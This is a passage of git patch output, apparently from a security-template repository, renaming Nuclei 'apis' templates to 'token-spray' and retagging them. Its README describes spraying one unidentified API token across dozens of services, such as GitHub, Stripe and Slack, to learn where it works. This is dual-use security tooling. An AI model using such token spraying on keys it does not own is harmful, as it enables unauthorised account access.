{apis => token-spray}/mailgun.yaml | 0 {apis => token-spray}/mapbox.yaml | 0 {apis => token-spray}/nerdgraph.yaml | 0 {apis => token-spray}/npm.yaml | 0 {apis => token-spray}/openweather.yaml | 0 {apis => token-spray}/pagerduty.yaml | 0 {apis => token-spray}/pendo.yaml | 0 {apis => token-spray}/pivotaltracker.yaml | 0 {apis => token-spray}/postmark.yaml | 0 {apis => token-spray}/sendgrid.yaml | 0 {apis => token-spray}/slack.yaml | 0 {apis => token-spray}/sonarcloud.yaml | 0 {apis => token-spray}/spotify.yaml | 0 {apis => token-spray}/square.yaml | 0 {apis => token-spray}/stripe.yaml | 0 {apis => token-spray}/tinypng.yaml | 0 {apis => token-spray}/travisci.yaml | 0 {apis => token-spray}/twitter.yaml | 0 {apis => token-spray}/visualstudio.yaml | 0 {apis => token-spray}/wakatime.yaml | 0 {apis => token-spray}/weglot.yaml | 0 {apis => token-spray}/youtube.yaml | 0 64 files changed, 4 insertions(+), 3 deletions(-) rename {apis => token-spray}/README.md (76%) rename {apis => token-spray}/asana.yaml (100%) rename {apis => token-spray}/bingmaps.yaml (100%) rename {apis => token-spray}/bitly.yaml (100%) rename {apis => token-spray}/buildkite.yaml (100%) rename {apis => token-spray}/buttercms.yaml (100%) rename {apis => token-spray}/calendly.yaml (100%) rename {apis => token-spray}/circleci.yaml (100%) rename {apis => token-spray}/deviantart.yaml (100%) rename {apis => token-spray}/dropbox.yaml (100%) rename {apis => token-spray}/github.yaml (100%) rename {apis => token-spray}/google-autocomplete.yaml (100%) rename {apis => token-spray}/google-customsearch.yaml (100%) rename {apis => token-spray}/google-directions.yaml (100%) rename {apis => token-spray}/google-elevation.yaml (100%) rename {apis => token-spray}/google-fcm.yaml (100%) rename {apis => token-spray}/google-findplacefromtext.yaml (100%) rename {apis => token-spray}/google-gedistancematrix.yaml (100%) rename {apis => token-spray}/google-geocode.yaml (100%) rename {apis => token-spray}/google-geolocation.yaml (100%) rename {apis => token-spray}/google-mapsembed.yaml (100%) rename {apis => token-spray}/google-mapsembedadvanced.yaml (100%) rename {apis => token-spray}/google-nearbysearch.yaml (100%) rename {apis => token-spray}/google-nearestroads.yaml (100%) rename {apis => token-spray}/google-placedetails.yaml (100%) rename {apis => token-spray}/google-placesphoto.yaml (100%) rename {apis => token-spray}/google-playablelocations.yaml (100%) rename {apis => token-spray}/google-routetotraveled.yaml (100%) rename {apis => token-spray}/google-speedlimit.yaml (100%) rename {apis => token-spray}/google-staticmaps.yaml (100%) rename {apis => token-spray}/google-streetview.yaml (100%) rename {apis => token-spray}/google-timezone.yaml (100%) rename {apis => token-spray}/googlet-extsearchplaces.yaml (100%) rename {apis => token-spray}/heroku.yaml (100%) rename {apis => token-spray}/hubspot.yaml (100%) rename {apis => token-spray}/instagram.yaml (100%) rename {apis => token-spray}/ipstack.yaml (100%) rename {apis => token-spray}/iterable.yaml (100%) rename {apis => token-spray}/jumpcloud.yaml (100%) rename {apis => token-spray}/lokalise.yaml (100%) rename {apis => token-spray}/loqate.yaml (100%) rename {apis => token-spray}/mailchimp.yaml (100%) rename {apis => token-spray}/mailgun.yaml (100%) rename {apis => token-spray}/mapbox.yaml (100%) rename {apis => token-spray}/nerdgraph.yaml (100%) rename {apis => token-spray}/npm.yaml (100%) rename {apis => token-spray}/openweather.yaml (100%) rename {apis => token-spray}/pagerduty.yaml (100%) rename {apis => token-spray}/pendo.yaml (100%) rename {apis => token-spray}/pivotaltracker.yaml (100%) rename {apis => token-spray}/postmark.yaml (100%) rename {apis => token-spray}/sendgrid.yaml (100%) rename {apis => token-spray}/slack.yaml (100%) rename {apis => token-spray}/sonarcloud.yaml (100%) rename {apis => token-spray}/spotify.yaml (100%) rename {apis => token-spray}/square.yaml (100%) rename {apis => token-spray}/stripe.yaml (100%) rename {apis => token-spray}/tinypng.yaml (100%) rename {apis => token-spray}/travisci.yaml (100%) rename {apis => token-spray}/twitter.yaml (100%) rename {apis => token-spray}/visualstudio.yaml (100%) rename {apis => token-spray}/wakatime.yaml (100%) rename {apis => token-spray}/weglot.yaml (100%) rename {apis => token-spray}/youtube.yaml (100%) diff --git a/apis/README.md b/token-spray/README.md similarity index 76% rename from apis/README.md rename to token-spray/README.md index 66c544fcdf..24081b4662 100644 --- a/apis/README.md +++ b/token-spray/README.md @@ -2,13 +2,14 @@ This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). ## Usage -You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `apis` directory assumes the input API token will be provided using CLI `var` flag. +You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag. ```bash # Run Nuclei specifying all the api templates: -nuclei -u null -t apis/ -var token=thisIsMySecretTokenThatIWantToTest +nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest ``` ## Credits -These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. +These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. + diff --git a/apis/asana.yaml b/token-spray/asana.yaml similarity index 100% rename from apis/asana.yaml rename to token-spray/asana.yaml diff --git a/apis/bingmaps.yaml b/token-spray/bingmaps.yaml similarity index 100% rename from apis/bingmaps.yaml rename to token-spray/bingmaps.yaml diff --git a/apis/bitly.yaml b/token-spray/bitly.yaml similarity index 100% rename from apis/bitly.yaml rename to token-spray/bitly.yaml diff --git a/apis/buildkite.yaml b/token-spray/buildkite.yaml similarity index 100% rename from apis/buildkite.yaml rename to token-spray/buildkite.yaml diff --git a/apis/buttercms.yaml b/token-spray/buttercms.yaml similarity index 100% rename from apis/buttercms.yaml rename to token-spray/buttercms.yaml diff --git a/apis/calendly.yaml b/token-spray/calendly.yaml similarity index 100% rename from apis/calendly.yaml rename to token-spray/calendly.yaml diff --git a/apis/circleci.yaml b/token-spray/circleci.yaml similarity index 100% rename from apis/circleci.yaml rename to token-spray/circleci.yaml diff --git a/apis/deviantart.yaml b/token-spray/deviantart.yaml similarity index 100% rename from apis/deviantart.yaml rename to token-spray/deviantart.yaml diff --git a/apis/dropbox.yaml b/token-spray/dropbox.yaml similarity index 100% rename from apis/dropbox.yaml rename to token-spray/dropbox.yaml diff --git a/apis/github.yaml b/token-spray/github.yaml similarity index 100% rename from apis/github.yaml rename to token-spray/github.yaml diff --git a/apis/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml similarity index 100% rename from apis/google-autocomplete.yaml rename to token-spray/google-autocomplete.yaml diff --git a/apis/google-customsearch.yaml b/token-spray/google-customsearch.yaml similarity index 100% rename from apis/google-customsearch.yaml rename to token-spray/google-customsearch.yaml diff --git a/apis/google-directions.yaml b/token-spray/google-directions.yaml similarity index 100% rename from apis/google-directions.yaml rename to token-spray/google-directions.yaml diff --git a/apis/google-elevation.yaml b/token-spray/google-elevation.yaml similarity index 100% rename from apis/google-elevation.yaml rename to token-spray/google-elevation.yaml diff --git a/apis/google-fcm.yaml b/token-spray/google-fcm.yaml similarity index 100% rename from apis/google-fcm.yaml rename to token-spray/google-fcm.yaml diff --git a/apis/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml similarity index 100% rename from apis/google-findplacefromtext.yaml rename to token-spray/google-findplacefromtext.yaml diff --git a/apis/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml similarity index 100% rename from apis/google-gedistancematrix.yaml rename to token-spray/google-gedistancematrix.yaml diff --git a/apis/google-geocode.yaml b/token-spray/google-geocode.yaml similarity index 100% rename from apis/google-geocode.yaml rename to token-spray/google-geocode.yaml diff --git a/apis/google-geolocation.yaml b/token-spray/google-geolocation.yaml similarity index 100% rename from apis/google-geolocation.yaml rename to token-spray/google-geolocation.yaml diff --git a/apis/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml similarity index 100% rename from apis/google-mapsembed.yaml rename to token-spray/google-mapsembed.yaml diff --git a/apis/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml similarity index 100% rename from apis/google-mapsembedadvanced.yaml rename to token-spray/google-mapsembedadvanced.yaml diff --git a/apis/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml similarity index 100% rename from apis/google-nearbysearch.yaml rename to token-spray/google-nearbysearch.yaml diff --git a/apis/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml similarity index 100% rename from apis/google-nearestroads.yaml rename to token-spray/google-nearestroads.yaml diff --git a/apis/google-placedetails.yaml b/token-spray/google-placedetails.yaml similarity index 100% rename from apis/google-placedetails.yaml rename to token-spray/google-placedetails.yaml diff --git a/apis/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml similarity index 100% rename from apis/google-placesphoto.yaml rename to token-spray/google-placesphoto.yaml diff --git a/apis/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml similarity index 100% rename from apis/google-playablelocations.yaml rename to token-spray/google-playablelocations.yaml diff --git a/apis/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml similarity index 100% rename from apis/google-routetotraveled.yaml rename to token-spray/google-routetotraveled.yaml diff --git a/apis/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml similarity index 100% rename from apis/google-speedlimit.yaml rename to token-spray/google-speedlimit.yaml diff --git a/apis/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml similarity index 100% rename from apis/google-staticmaps.yaml rename to token-spray/google-staticmaps.yaml diff --git a/apis/google-streetview.yaml b/token-spray/google-streetview.yaml similarity index 100% rename from apis/google-streetview.yaml rename to token-spray/google-streetview.yaml diff --git a/apis/google-timezone.yaml b/token-spray/google-timezone.yaml similarity index 100% rename from apis/google-timezone.yaml rename to token-spray/google-timezone.yaml diff --git a/apis/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml similarity index 100% rename from apis/googlet-extsearchplaces.yaml rename to token-spray/googlet-extsearchplaces.yaml diff --git a/apis/heroku.yaml b/token-spray/heroku.yaml similarity index 100% rename from apis/heroku.yaml rename to token-spray/heroku.yaml diff --git a/apis/hubspot.yaml b/token-spray/hubspot.yaml similarity index 100% rename from apis/hubspot.yaml rename to token-spray/hubspot.yaml diff --git a/apis/instagram.yaml b/token-spray/instagram.yaml similarity index 100% rename from apis/instagram.yaml rename to token-spray/instagram.yaml diff --git a/apis/ipstack.yaml b/token-spray/ipstack.yaml similarity index 100% rename from apis/ipstack.yaml rename to token-spray/ipstack.yaml diff --git a/apis/iterable.yaml b/token-spray/iterable.yaml similarity index 100% rename from apis/iterable.yaml rename to token-spray/iterable.yaml diff --git a/apis/jumpcloud.yaml b/token-spray/jumpcloud.yaml similarity index 100% rename from apis/jumpcloud.yaml rename to token-spray/jumpcloud.yaml diff --git a/apis/lokalise.yaml b/token-spray/lokalise.yaml similarity index 100% rename from apis/lokalise.yaml rename to token-spray/lokalise.yaml diff --git a/apis/loqate.yaml b/token-spray/loqate.yaml similarity index 100% rename from apis/loqate.yaml rename to token-spray/loqate.yaml diff --git a/apis/mailchimp.yaml b/token-spray/mailchimp.yaml similarity index 100% rename from apis/mailchimp.yaml rename to token-spray/mailchimp.yaml diff --git a/apis/mailgun.yaml b/token-spray/mailgun.yaml similarity index 100% rename from apis/mailgun.yaml rename to token-spray/mailgun.yaml diff --git a/apis/mapbox.yaml b/token-spray/mapbox.yaml similarity index 100% rename from apis/mapbox.yaml rename to token-spray/mapbox.yaml diff --git a/apis/nerdgraph.yaml b/token-spray/nerdgraph.yaml similarity index 100% rename from apis/nerdgraph.yaml rename to token-spray/nerdgraph.yaml diff --git a/apis/npm.yaml b/token-spray/npm.yaml similarity index 100% rename from apis/npm.yaml rename to token-spray/npm.yaml diff --git a/apis/openweather.yaml b/token-spray/openweather.yaml similarity index 100% rename from apis/openweather.yaml rename to token-spray/openweather.yaml diff --git a/apis/pagerduty.yaml b/token-spray/pagerduty.yaml similarity index 100% rename from apis/pagerduty.yaml rename to token-spray/pagerduty.yaml diff --git a/apis/pendo.yaml b/token-spray/pendo.yaml similarity index 100% rename from apis/pendo.yaml rename to token-spray/pendo.yaml diff --git a/apis/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml similarity index 100% rename from apis/pivotaltracker.yaml rename to token-spray/pivotaltracker.yaml diff --git a/apis/postmark.yaml b/token-spray/postmark.yaml similarity index 100% rename from apis/postmark.yaml rename to token-spray/postmark.yaml diff --git a/apis/sendgrid.yaml b/token-spray/sendgrid.yaml similarity index 100% rename from apis/sendgrid.yaml rename to token-spray/sendgrid.yaml diff --git a/apis/slack.yaml b/token-spray/slack.yaml similarity index 100% rename from apis/slack.yaml rename to token-spray/slack.yaml diff --git a/apis/sonarcloud.yaml b/token-spray/sonarcloud.yaml similarity index 100% rename from apis/sonarcloud.yaml rename to token-spray/sonarcloud.yaml diff --git a/apis/spotify.yaml b/token-spray/spotify.yaml similarity index 100% rename from apis/spotify.yaml rename to token-spray/spotify.yaml diff --git a/apis/square.yaml b/token-spray/square.yaml similarity index 100% rename from apis/square.yaml rename to token-spray/square.yaml diff --git a/apis/stripe.yaml b/token-spray/stripe.yaml similarity index 100% rename from apis/stripe.yaml rename to token-spray/stripe.yaml diff --git a/apis/tinypng.yaml b/token-spray/tinypng.yaml similarity index 100% rename from apis/tinypng.yaml rename to token-spray/tinypng.yaml diff --git a/apis/travisci.yaml b/token-spray/travisci.yaml similarity index 100% rename from apis/travisci.yaml rename to token-spray/travisci.yaml diff --git a/apis/twitter.yaml b/token-spray/twitter.yaml similarity index 100% rename from apis/twitter.yaml rename to token-spray/twitter.yaml diff --git a/apis/visualstudio.yaml b/token-spray/visualstudio.yaml similarity index 100% rename from apis/visualstudio.yaml rename to token-spray/visualstudio.yaml diff --git a/apis/wakatime.yaml b/token-spray/wakatime.yaml similarity index 100% rename from apis/wakatime.yaml rename to token-spray/wakatime.yaml diff --git a/apis/weglot.yaml b/token-spray/weglot.yaml similarity index 100% rename from apis/weglot.yaml rename to token-spray/weglot.yaml diff --git a/apis/youtube.yaml b/token-spray/youtube.yaml similarity index 100% rename from apis/youtube.yaml rename to token-spray/youtube.yaml From 73a39d9bd6c820eff6dfc7af4b044641a52ae278 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 02:32:57 +0530 Subject: [PATCH 2741/4083] tags update this allows to run these templates using tags --- token-spray/asana.yaml | 2 +- token-spray/bingmaps.yaml | 2 +- token-spray/bitly.yaml | 2 +- token-spray/buildkite.yaml | 2 +- token-spray/buttercms.yaml | 2 +- token-spray/calendly.yaml | 2 +- token-spray/circleci.yaml | 2 +- token-spray/deviantart.yaml | 2 +- token-spray/dropbox.yaml | 2 +- token-spray/github.yaml | 2 +- token-spray/google-autocomplete.yaml | 2 +- token-spray/google-customsearch.yaml | 2 +- token-spray/google-directions.yaml | 2 +- token-spray/google-elevation.yaml | 2 +- token-spray/google-fcm.yaml | 2 +- token-spray/google-findplacefromtext.yaml | 2 +- token-spray/google-gedistancematrix.yaml | 2 +- token-spray/google-geocode.yaml | 2 +- token-spray/google-geolocation.yaml | 2 +- token-spray/google-mapsembed.yaml | 2 +- token-spray/google-mapsembedadvanced.yaml | 2 +- token-spray/google-nearbysearch.yaml | 2 +- token-spray/google-nearestroads.yaml | 2 +- token-spray/google-placedetails.yaml | 2 +- token-spray/google-placesphoto.yaml | 2 +- token-spray/google-playablelocations.yaml | 2 +- token-spray/google-routetotraveled.yaml | 2 +- token-spray/google-speedlimit.yaml | 2 +- token-spray/google-staticmaps.yaml | 2 +- token-spray/google-streetview.yaml | 2 +- token-spray/google-timezone.yaml | 2 +- token-spray/googlet-extsearchplaces.yaml | 2 +- token-spray/heroku.yaml | 2 +- token-spray/hubspot.yaml | 2 +- token-spray/instagram.yaml | 2 +- token-spray/ipstack.yaml | 2 +- token-spray/iterable.yaml | 2 +- token-spray/jumpcloud.yaml | 2 +- token-spray/lokalise.yaml | 2 +- token-spray/loqate.yaml | 2 +- token-spray/mailchimp.yaml | 2 +- token-spray/mailgun.yaml | 2 +- token-spray/mapbox.yaml | 2 +- token-spray/nerdgraph.yaml | 2 +- token-spray/npm.yaml | 2 +- token-spray/openweather.yaml | 2 +- token-spray/pagerduty.yaml | 2 +- token-spray/pendo.yaml | 2 +- token-spray/pivotaltracker.yaml | 2 +- token-spray/postmark.yaml | 2 +- token-spray/sendgrid.yaml | 2 +- token-spray/slack.yaml | 2 +- token-spray/sonarcloud.yaml | 2 +- token-spray/spotify.yaml | 2 +- token-spray/square.yaml | 2 +- token-spray/stripe.yaml | 2 +- token-spray/tinypng.yaml | 2 +- token-spray/travisci.yaml | 2 +- token-spray/twitter.yaml | 2 +- token-spray/visualstudio.yaml | 2 +- token-spray/wakatime.yaml | 2 +- token-spray/weglot.yaml | 2 +- token-spray/youtube.yaml | 2 +- 63 files changed, 63 insertions(+), 63 deletions(-) diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 2fe0f49393..9282cf7a4d 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developers.asana.com/docs/using-terminal severity: info - tags: api,asana + tags: token-spray,asana requests: - method: GET diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index c67715bde2..0892d85b9f 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address severity: info - tags: api,bing,maps,bingmaps + tags: token-spray,bing,maps,bingmaps requests: - method: GET diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 09f5ff0e7c..57e1d5d3d4 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://dev.bitly.com/api-reference severity: info - tags: api,bitly + tags: token-spray,bitly requests: - method: GET diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index b2b80424b9..77e8e1e677 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://buildkite.com/docs/apis/rest-api/user severity: info - tags: api,buildkite + tags: token-spray,buildkite requests: - method: GET diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index 180c40b0d8..229da7b1d5 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://buttercms.com/docs/api/#introduction severity: info - tags: api,buttercms + tags: token-spray,buttercms requests: - method: GET diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index a1d104c013..1d8289fb37 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me severity: info - tags: api,calendly + tags: token-spray,calendly requests: - method: GET diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index ed9810615a..281d22b656 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: api,circle,circleci + tags: token-spray,circle,circleci requests: - method: GET diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 3b0459d16c..403b97a349 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://www.deviantart.com/developers/authentication severity: info - tags: api,deviantart + tags: token-spray,deviantart requests: - method: POST diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index 4af40f9088..29679e2b2f 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://www.dropbox.com/developers/documentation/http/documentation severity: info - tags: api,dropbox + tags: token-spray,dropbox requests: - method: POST diff --git a/token-spray/github.yaml b/token-spray/github.yaml index 3e2b534c3b..c6d1d560de 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.github.com/en/rest/reference/users severity: info - tags: api,github + tags: token-spray,github requests: - method: GET diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index 1752f7cb58..b3c459082e 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -4,7 +4,7 @@ info: name: Google Autocomplete API Test author: zzeitlin severity: info - tags: api,google,autocomplete + tags: token-spray,google,autocomplete requests: - method: GET diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 480967da60..0be1636139 100644 --- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -4,7 +4,7 @@ info: name: Google Custom Search API Test author: zzeitlin severity: info - tags: api,google,search + tags: token-spray,google,search requests: - method: GET diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index 471b96270c..a6b8cea46b 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -4,7 +4,7 @@ info: name: Google Directions API Test author: zzeitlin severity: info - tags: api,google,directions + tags: token-spray,google,directions requests: - method: GET diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index 1617b15298..480bc31fb7 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -4,7 +4,7 @@ info: name: Google Elevation API Test author: zzeitlin severity: info - tags: api,google,elevation + tags: token-spray,google,elevation requests: - method: GET diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index 6add1c6af0..aba6f43579 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -4,7 +4,7 @@ info: name: Google FCM API Test author: zzeitlin severity: info - tags: api,google,fcm,firebase,cloud,messaging + tags: token-spray,google,fcm,firebase,cloud,messaging requests: - method: POST diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index b856715d5b..dcecba34b2 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -4,7 +4,7 @@ info: name: Google Find Place From Text API Test author: zzeitlin severity: info - tags: api,google,find,text + tags: token-spray,google,find,text requests: - method: GET diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index df37bed58a..62795ea15e 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -4,7 +4,7 @@ info: name: Google Distance Matrix API Test author: zzeitlin severity: info - tags: api,google,distance,matrix + tags: token-spray,google,distance,matrix requests: - method: GET diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 75b5069d7c..91826af391 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -4,7 +4,7 @@ info: name: Google Geocode API Test author: zzeitlin severity: info - tags: api,google,geocode + tags: token-spray,google,geocode requests: - method: GET diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index d20eb129e0..88d1ce9ffc 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -4,7 +4,7 @@ info: name: Google Geolocation API Test author: zzeitlin severity: info - tags: api,google,geolocation + tags: token-spray,google,geolocation requests: - method: GET diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index 6d94d1f8c6..d7b47585f1 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -4,7 +4,7 @@ info: name: Google Maps Embed API Test author: zzeitlin severity: info - tags: api,google,maps,embed + tags: token-spray,google,maps,embed requests: - method: GET diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 54897376d7..5f8e4d2721 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -4,7 +4,7 @@ info: name: Google Maps Embed (Advanced) API Test author: zzeitlin severity: info - tags: api,google,maps,embed + tags: token-spray,google,maps,embed requests: - method: GET diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index 95fecf43c2..752d9d9814 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -4,7 +4,7 @@ info: name: Google Nearby Search API Test author: zzeitlin severity: info - tags: api,google,search,nearby + tags: token-spray,google,search,nearby requests: - method: GET diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index 1e24f7e04d..e804422ff0 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -4,7 +4,7 @@ info: name: Google Nearest Roads API Test author: zzeitlin severity: info - tags: api,google,roads + tags: token-spray,google,roads requests: - method: GET diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index cd40c956a2..30ca3e6184 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -4,7 +4,7 @@ info: name: Google Place Details API Test author: zzeitlin severity: info - tags: api,google,place,details + tags: token-spray,google,place,details requests: - method: GET diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml index 1df3d91138..82f33c2e1d 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -4,7 +4,7 @@ info: name: Google Places Photo API Test author: zzeitlin severity: info - tags: api,google,places,photo + tags: token-spray,google,places,photo requests: - method: GET diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index 370811d7c4..2e38d6316a 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -4,7 +4,7 @@ info: name: Google Playable Locations API Test author: zzeitlin severity: info - tags: api,google,playable,locations + tags: token-spray,google,playable,locations requests: - method: GET diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index c943449c3e..c97cfcee59 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -4,7 +4,7 @@ info: name: Google Route to Traveled API Test author: zzeitlin severity: info - tags: api,google,route + tags: token-spray,google,route requests: - method: GET diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index 240c951616..5eec3d0a53 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml @@ -4,7 +4,7 @@ info: name: Google Speed Limit API Test author: zzeitlin severity: info - tags: api,google,speed,limit + tags: token-spray,google,speed,limit requests: - method: GET diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index 0656e26f34..d4a012bff2 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -4,7 +4,7 @@ info: name: Google Static Maps API Test author: zzeitlin severity: info - tags: api,google,maps + tags: token-spray,google,maps requests: - method: GET diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index 11037b39d6..49d043391d 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -4,7 +4,7 @@ info: name: Google Static Streetview API Test author: zzeitlin severity: info - tags: api,google,streetview + tags: token-spray,google,streetview requests: - method: GET diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 45227bc761..273101bcc9 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -4,7 +4,7 @@ info: name: Google Timezone API Test author: zzeitlin severity: info - tags: api,google,timezone + tags: token-spray,google,timezone requests: - method: GET diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index e5e6d49a7a..c3683703cf 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -4,7 +4,7 @@ info: name: Google Places Text Search API Test author: zzeitlin severity: info - tags: api,google,search,places,text + tags: token-spray,google,search,places,text requests: - method: GET diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index c90ca9e09f..9f08e416d5 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api severity: info - tags: api,heroku + tags: token-spray,heroku requests: - method: POST diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index 7212dc3fa0..86566864f0 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info - tags: api,hubspot + tags: token-spray,hubspot requests: - method: GET diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 6022203c41..289546f452 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ 